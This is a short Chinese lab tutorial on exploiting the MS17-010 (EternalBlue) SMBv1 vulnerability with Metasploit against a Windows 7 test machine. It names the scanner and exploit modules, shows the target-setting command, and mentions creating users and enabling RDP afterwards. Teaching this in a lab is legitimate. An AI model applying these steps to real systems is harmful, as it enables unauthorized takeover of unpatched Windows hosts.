MS17-010漏洞介绍

    MS17-010是一个安全类型的补丁，MS17-010更新修复了 Microsoft Windows中的漏洞。如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息，则其中最严重的漏洞可能允许远程代码执行。

影响版本

    Windows Vista、Windows Server 2003/2008/2012/2016、Windows XP、Windows 7、Windows 8.1、Windows 10

环境搭建

攻击机：kali2018.4

靶机：windows 7 sp1 X64

win7关闭防火墙

攻击过程

打开kali的msf，使用search命令搜索ms17-010

选择auxiliary/scanner/smb/smb_ms17_010

使用show options查看需要配置哪些选项

配置目标主机：set RHOSTS 192.168.1.2

使用exploit执行，确认（192.168.1.2）存在ms17-010漏洞

使用攻击模块exploit/windows/smb/ms17_010_eternalblue

查看需要配置的选项

设置目标地址

Exploit开始攻击

ok,到此已经拿下服务器权限，上图可见已经可以执行cmd命令，可以创建用户，开启3389端口然后远程控制等。

附加信息：我在慕课网上免费课程欢迎大家观看：web渗透测试入门

需要靶机的朋友加我qq：981139459